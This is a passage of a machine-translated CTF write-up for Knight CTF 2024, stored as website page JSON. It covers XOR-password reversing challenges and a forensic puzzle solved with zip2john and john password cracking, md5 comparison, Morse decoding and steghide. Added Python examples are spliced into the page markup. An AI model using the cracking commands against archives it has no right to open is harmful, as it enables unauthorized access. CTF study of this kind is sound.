{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-knight-ctf-2024-en","result":{"data":{"markdownRemark":{"id":"7c27604f-ce39-5f49-be2d-4fd9c786bc93","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-knight-ctf-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in Knight CTF 2024 with 0nePadding.</p>\n<p>I couldn’t solve many challenges due to time constraints, but we finished in 68th place.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/905d18eafe9a992c387e0b95b82547af/6f278/image-20240123141643921.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABZklEQVQY0xWQ23qkIBCEvdroKI1AcwZFBXXiTBKz7/9uy15VXdRfXV83ZGQDUJSy74euexCgfz5aSiljDAAkchQMOWMUrBScArJRjGCQVd+A0H7JwNA613a1AQZClNbPc89buo41eeUlUxy84kGJyaDDUcKAFaYqoJuZclJZjlpIXUoOIUqlvLPv537ltHjttRQUBKWrN5UPksuRNs7LGFyaQ9nm68wlL3tZ5zk4Z7a8bKudotvznNf5LMt1/A/UPOeMc978vEJlzjx9Pbe/3+fnvhxblDj2fW+tOjdStun3a79f5X4fP6/K+jRZNoI2unkQbkLwc2IotfPTlt/3vZbiYqRCDiCMc/nYX/cd0oLamBBjSiElLnXTE2CChylKiVrXAolKxehzTte116nrEn1w2lillbFVDYGK1FvYPLqWAlFY/z9wBhpZiiYFM3k9e72vcZ2s02gUt0rwkQDpu/aj69pq/gF8QS70ZRliLQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/905d18eafe9a992c387e0b95b82547af/8ac56/image-20240123141643921.webp 240w,\n/static/905d18eafe9a992c387e0b95b82547af/d3be9/image-20240123141643921.webp 
480w,\n/static/905d18eafe9a992c387e0b95b82547af/e46b2/image-20240123141643921.webp 960w,\n/static/905d18eafe9a992c387e0b95b82547af/f992d/image-20240123141643921.webp 1440w,\n/static/905d18eafe9a992c387e0b95b82547af/a31b7/image-20240123141643921.webp 1488w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/905d18eafe9a992c387e0b95b82547af/8ff5a/image-20240123141643921.png 240w,\n/static/905d18eafe9a992c387e0b95b82547af/e85cb/image-20240123141643921.png 480w,\n/static/905d18eafe9a992c387e0b95b82547af/d9199/image-20240123141643921.png 960w,\n/static/905d18eafe9a992c387e0b95b82547af/07a9c/image-20240123141643921.png 1440w,\n/static/905d18eafe9a992c387e0b95b82547af/6f278/image-20240123141643921.png 1488w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/905d18eafe9a992c387e0b95b82547af/d9199/image-20240123141643921.png\"\n            alt=\"image-20240123141643921\"\n            title=\"image-20240123141643921\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It was an unusually forensics-heavy CTF, and I had a lot of fun participating.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 
0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#dragons-binaryrev\">Dragon’s Binary(Rev)</a></li>\n<li><a href=\"#knight-armouryrev\">Knight Armoury(Rev)</a></li>\n<li><a href=\"#flag-huntforensic\">Flag Hunt!(Forensic)</a></li>\n<li>\n<p><a href=\"#networking\">Networking</a></p>\n<ul>\n<li><a href=\"#vicker-ipforensic\">Vicker IP(Forensic)</a></li>\n<li><a href=\"#basic-enumforensic\">Basic Enum(Forensic)</a></li>\n<li><a href=\"#vulnerable-serviceforensic\">Vulnerable Service(Forensic)</a></li>\n<li><a href=\"#portforensic\">PORT(Forensic)</a></li>\n<li><a href=\"#cve-idforensic\">CVE ID(Forensic)</a></li>\n<li><a href=\"#famous-toolforensic\">Famous Tool(Forensic)</a></li>\n<li><a href=\"#hidden-fileforensic\">Hidden File(Forensic)</a></li>\n<li><a href=\"#confidentialforensic\">Confidential(Forensic)</a></li>\n<li><a href=\"#backdoorforensic\">BackDoor(Forensic)</a></li>\n<li><a href=\"#backdoor-pathforensic\">BackDoor Path(Forensic)</a></li>\n<li><a href=\"#super-adminforensic\">Super Admin(Forensic)</a></li>\n<li><a href=\"#admin-flagforensic\">Admin Flag(Forensic)</a></li>\n<li><a href=\"#vulnforensic\">Vuln(Forensic)</a></li>\n<li><a href=\"#famous-tool-2forensic\">Famous Tool 2(Forensic)</a></li>\n<li><a href=\"#something-interestingforensic\">Something Interesting(Forensic)</a></li>\n<li><a href=\"#hidden-pageforensic\">Hidden Page(Forensic)</a></li>\n<li><a href=\"#db-detailsforensic\">DB Details(Forensic)</a></li>\n<li><a href=\"#api-keyforensic\">API Key(Forensic)</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#digital-forensics\">Digital Forensics</a></p>\n<ul>\n<li><a href=\"#osforensic\">OS(Forensic)</a></li>\n<li><a href=\"#passwordforensic\">Password(Forensic)</a></li>\n<li><a href=\"#ip-addrforensic\">IP Addr(Forensic)</a></li>\n<li><a href=\"#noteforensic\">Note(Forensic)</a></li>\n<li><a 
href=\"#executionforensic\">Execution(Forensic)</a></li>\n<li><a href=\"#path-of-the-executableforensic\">Path of the Executable(Forensic)</a></li>\n<li><a href=\"#maliciousforensic\">Malicious(Forensic)</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"dragons-binaryrev\" style=\"position:relative;\"><a href=\"#dragons-binaryrev\" aria-label=\"dragons binaryrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Dragon’s Binary(Rev)</h2>\n<blockquote>\n<p>In the mystical land of Eldoria, a fierce dragon had captured the kingdom’s most precious treasure, hiding it behind a magical binary. The bravest knight of the realm, Sir Emeric, known for both sword and wit, embarked on a quest to retrieve the treasure. To succeed, he must reverse the dragon’s binary. As Sir Emeric’s trusted apprentice in “Dragon’s Binary” you are tasked with solving the cipher to reveal the hidden treasure and help vanquish the dragon’s spell. 
Your journey is filled with mystery and danger, where only the sharpest mind can prevail.</p>\n</blockquote>\n<p>When I analyzed the file provided as the challenge binary in Ghidra, I found that it validates a password read from standard input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 557px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/30d00/image-20240121114105370.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 169.16666666666663%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/8ac56/image-20240121114105370.webp 240w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/d3be9/image-20240121114105370.webp 480w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/9b7c7/image-20240121114105370.webp 557w\"\n              sizes=\"(max-width: 557px) 100vw, 557px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/8ff5a/image-20240121114105370.png 240w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/e85cb/image-20240121114105370.png 480w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/30d00/image-20240121114105370.png 557w\"\n            sizes=\"(max-width: 557px) 100vw, 557px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/30d00/image-20240121114105370.png\"\n            alt=\"image-20240121114105370\"\n            title=\"image-20240121114105370\"\n   
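The Dragon's Binary check described in this section, reimplemented and then inverted, as an added example (this is not the challenge's own code). The write-up only says that the binary XORs letMeIn and the user input with IamDragon and compares the results; how a 9-byte key is applied to a 7-byte string is not shown, so repeating-key XOR is assumed here, and the stored buffer is computed rather than dumped from the binary.

```python
# Added example for the Dragon's Binary write-up; this is not the challenge's
# own code. Assumptions: repeating-key XOR (byte i is XORed with
# key[i % len(key)]), and STORED is what the binary would hold in place of the
# plaintext password. Both are inferred from the write-up, not read from the binary.
KEY = b"IamDragon"


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR. It is its own inverse because (a ^ k) ^ k == a."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# The constant the binary compares against (assumption: letMeIn XOR IamDragon).
STORED = xor_with_key(b"letMeIn")


def check_password(candidate: bytes) -> bool:
    """The check as the write-up describes it: XOR the input with the key and
    compare it against the XORed constant. Both sides use the same key, so
    this is equivalent to comparing plaintexts; the XOR keeps the password
    out of a plain `strings` dump but does not protect it."""
    return xor_with_key(candidate) == STORED


def recover_password(stored: bytes = STORED, key: bytes = KEY) -> bytes:
    """Invert the check: XOR the stored constant with the known key."""
    return xor_with_key(stored, key)


def flag() -> str:
    return "KCTF{" + recover_password().decode() + "}"


if __name__ == "__main__":
    print("stored buffer:", STORED.hex())
    print("recovered:", recover_password())
    print(check_password(b"letMeIn"), check_password(b"letmein"))
    print(flag())
```

Because the key is in the binary next to the buffer it protects, recovering the password is one XOR; the same applies to any check that XORs both sides with a constant stored in the executable.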
         loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The check XORs the hard-coded string <code class=\"language-text\">letMeIn</code> with the key <code class=\"language-text\">IamDragon</code> and compares the result against the XOR of the user input with the same key. Because both sides are XORed with the same key, the comparison succeeds only when the input is <code class=\"language-text\">letMeIn</code>; the XOR hides the string from a casual look at the binary but adds no real protection.</p>\n<p>The correct flag was <code class=\"language-text\">KCTF{letMeIn}</code>.</p>\n<h2 id=\"knight-armouryrev\" style=\"position:relative;\"><a href=\"#knight-armouryrev\" aria-label=\"knight armouryrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Knight Armoury(Rev)</h2>\n<blockquote>\n<p>In a realm where magic and technology merge, lies the Knight Armoury, home to the legendary “Sword of Bytes.” Forged by Knight Squad, this digital sword holds immense power. Your mission: reverse the ancient binary guarding the Armoury and claim the sword to become the protector of the digital kingdom. Only the wisest and most skilled in reverse engineering can succeed. 
Are you ready to embark on this epic journey?</p>\n</blockquote>\n<p>When I analyzed the challenge binary in Ghidra, the password was immediately obvious.</p>\n<p>Sending it to the server yielded the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 604px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/87254/image-20240121122032392.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 158.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/8ac56/image-20240121122032392.webp 240w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/d3be9/image-20240121122032392.webp 480w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/059a8/image-20240121122032392.webp 604w\"\n              sizes=\"(max-width: 604px) 100vw, 604px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/8ff5a/image-20240121122032392.png 240w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/e85cb/image-20240121122032392.png 480w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/87254/image-20240121122032392.png 604w\"\n            sizes=\"(max-width: 604px) 100vw, 604px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/87254/image-20240121122032392.png\"\n            alt=\"image-20240121122032392\"\n            title=\"image-20240121122032392\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"flag-huntforensic\" style=\"position:relative;\"><a href=\"#flag-huntforensic\" aria-label=\"flag huntforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Flag Hunt!(Forensic)</h2>\n<blockquote>\n<p>Hunt your way through the challenge and Capture The hidden Flag!!!</p>\n</blockquote>\n<p>The challenge archive is an encrypted ZIP. <code class=\"language-text\">zip2john</code> extracts its password hash, and cracking that hash with <code class=\"language-text\">john</code> against a wordlist gives the password needed to extract the archive.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">zip2john chall.zip <span class=\"token operator\">></span> hash.txt\n\n<span class=\"token comment\"># Crack the hash with a wordlist</span>\njohn --wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt hash.txt</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 878px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/94829/image-20240121124006712.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.416666666666668%; position: relative; bottom: 
0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsklEQVQY022PyQ6DMAxEubIKwqKyFAgQEkjK///dNLbKoVUPTy+WorEnkNuO87Se82ML5xzPy7KgqirUdQ0hBDvPcyRJ8pc4jhE4q7ErCa01jsPgehkfNOPRtui6joMICrodhiGiKOKAXwJ7zLCHxLYpGL3jcivsuUEpBSkl1nXlN11MS40xfDnR+qV936NpGnaWZQimacYwPPnDOI4oCuEpuB75vpCql2XJvqGaaZp++Q3q5Wdmw0d3kgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/8ac56/image-20240121124006712.webp 240w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/d3be9/image-20240121124006712.webp 480w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/6749f/image-20240121124006712.webp 878w\"\n              sizes=\"(max-width: 878px) 100vw, 878px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/8ff5a/image-20240121124006712.png 240w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/e85cb/image-20240121124006712.png 480w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/94829/image-20240121124006712.png 878w\"\n            sizes=\"(max-width: 878px) 100vw, 878px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/94829/image-20240121124006712.png\"\n            alt=\"image-20240121124006712\"\n            title=\"image-20240121124006712\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After extracting the files, I found a large number of image files and a file called <code class=\"language-text\">key.wav</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; 
max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/84ee5/image-20240121124113761.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABxklEQVQoz22OzU4aARSF5y3cEAEZa2MTu8DBtqIV0UJb/jtGUFINtIKiEECFwZkCwz+K2MaaNF111TeofYAubNJ3+jqw6MYubr6ck3vPuYJaanBd79H4cMGl1qSrX9FXaly0r+mWq1x2bgzWDH6ma/gDwz+vNOg3PzHQWnT0IVfVLrra42v3I0L4dQDvihM5GGZ9+SmbERn3ooOYvMnqM4ntjSiuMWNjbhm+2/mEqLH34vkiG8EQXtcyEV+Aly4nQiF3xtBoUE6b9NUmmtKho9SpqX3aBnXtnFZ5xJHWqZ31xrp61qVjfKopbXpqi1Kxxk37CuFtdJuoz0tiewfZu8beTpLQ+gr7iRRBo/HwfYbA6hLZvUP8riUKBzli/leGzhAPBcgkU+zKEVK7SRJyCOEgXUA/0cgdKVSyJ2QzJZSjY/LHJdS6TjweJ51O4/P7yRcKmEwmxGkRm82GTbT949TUFKIoIpTzJYrvEminKvtbUSrFCntymC/fvnP76w/DwQU/bn+Ow+7ufjMxMYHFYsFsNt+byUkzgkOSWFiQeDw3x8OZaR7NzjLzQGTN7UZ+E2F+XsJutyNJDjweD1ardXw8Cv3f/AUyqCKY0yLJgQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/8ac56/image-20240121124113761.webp 240w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/d3be9/image-20240121124113761.webp 480w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/e46b2/image-20240121124113761.webp 960w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/ceabe/image-20240121124113761.webp 1076w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/8ff5a/image-20240121124113761.png 240w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/e85cb/image-20240121124113761.png 480w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/d9199/image-20240121124113761.png 
960w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/84ee5/image-20240121124113761.png 1076w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/d9199/image-20240121124113761.png\"\n            alt=\"image-20240121124113761\"\n            title=\"image-20240121124113761\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Comparing the image files using md5 hashes shows that only one file has a different hash value.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 773px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/10eeee4ec8f253eb6ff96195578d32c3/612f7/image-20240121124442840.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 14.166666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnklEQVQI1z1OywqEMBDzWq2iFA9a66uI1lutCwpr//+vsjtz8BCSTOaV+PBBOA445xBCwPHX27bBe4+u67CuK87zZE8ZgWp932OaJiilIIRAmqbIsgzJ83xx3zeu63pBPsaIcRyx7zsfoqXEy7KgKApIKZHnOeuyLFFVFetknmceHIaBQZpgrUVd12ia5s3oK/q6bVtmYwznWmv21P8DBz9UW20dYREAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/10eeee4ec8f253eb6ff96195578d32c3/8ac56/image-20240121124442840.webp 240w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/d3be9/image-20240121124442840.webp 480w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/c99d1/image-20240121124442840.webp 
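The hash comparison step above, automated as an added example (not code from the original post): group the extracted files by digest and report every file whose digest is not the most common one. The sample files are constructed in a temporary directory and stand in for the challenge images.

```python
# Added example for the Flag Hunt write-up; this is not code from the original
# post. The post compares the md5 of each extracted image by eye; this groups
# files by digest and returns the members of every non-majority group, so it
# also copes with more than one odd file. The sample files in demo() are
# constructed stand-ins for the challenge images.
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path


def file_digest(path, algo="md5"):
    """Hash a file in chunks. md5 is adequate here: the goal is to notice that
    files differ, not to resist a deliberately engineered collision."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_outliers(paths, algo="md5"):
    """Return the names of files whose digest is not the most common one."""
    by_digest = defaultdict(list)
    for p in paths:
        by_digest[file_digest(p, algo)].append(Path(p).name)
    if len(by_digest) < 2:
        return []  # all files identical (or no files): nothing stands out
    majority = max(by_digest.values(), key=len)
    return sorted(
        name
        for names in by_digest.values()
        if names is not majority
        for name in names
    )


def demo():
    """Constructed set: ten identical 'cover' JPEGs plus one copy with an
    appended payload, mimicking an image modified by steghide."""
    cover = b"\xff\xd8\xff\xe0" + b"cover-image-bytes" * 64 + b"\xff\xd9"
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for i in range(1, 11):
            (root / f"img{i:03d}.jpg").write_bytes(cover)
        (root / "img725.jpg").write_bytes(cover + b"<constructed hidden payload>")
        return find_outliers(sorted(root.glob("*.jpg")))


if __name__ == "__main__":
    print(demo())
```

On a shell with GNU coreutils the same grouping is <code>md5sum *.jpg | sort | uniq -c -w32</code>, which counts how many files share each digest; the line with a count of 1 is the file to look at.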
773w\"\n              sizes=\"(max-width: 773px) 100vw, 773px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/10eeee4ec8f253eb6ff96195578d32c3/8ff5a/image-20240121124442840.png 240w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/e85cb/image-20240121124442840.png 480w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/612f7/image-20240121124442840.png 773w\"\n            sizes=\"(max-width: 773px) 100vw, 773px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/10eeee4ec8f253eb6ff96195578d32c3/612f7/image-20240121124442840.png\"\n            alt=\"image-20240121124442840\"\n            title=\"image-20240121124442840\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><code class=\"language-text\">key.wav</code> contains Morse code; decoding it with an audio Morse decoder gives the passphrase <code class=\"language-text\">morsecodetotherescue!!</code>.</p>\n<p>Reference: <a href=\"https://morsecode.world/international/decoder/audio-decoder-adaptive.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Morse Code Adaptive Audio Decoder | Morse Code World</a></p>\n<p>Running <code class=\"language-text\">steghide extract</code> with this passphrase against <code class=\"language-text\">img725.jpg</code>, the image whose hash differs from the rest, then gives the flag.</p>\n<h2 id=\"networking\" style=\"position:relative;\"><a href=\"#networking\" aria-label=\"networking permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 
9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Networking</h2>\n<h3 id=\"vicker-ipforensic\" style=\"position:relative;\"><a href=\"#vicker-ipforensic\" aria-label=\"vicker ipforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Vicker IP(Forensic)</h3>\n<blockquote>\n<p>Hi! It’s good to see you again in my networking series. There are 18 challenges in total in this series, based on real-life events of how a server can be compromised. Please download the attachment, which will be used to answer all the questions. Don’t make it too complex. Just keep it simple. Hope you’ll solve them all. Wish you all very good luck.</p>\n<p>Scenario: Recently one of Knight Squad’s assets was compromised. We’ve figured out most of it but need your help to investigate the case more deeply. 
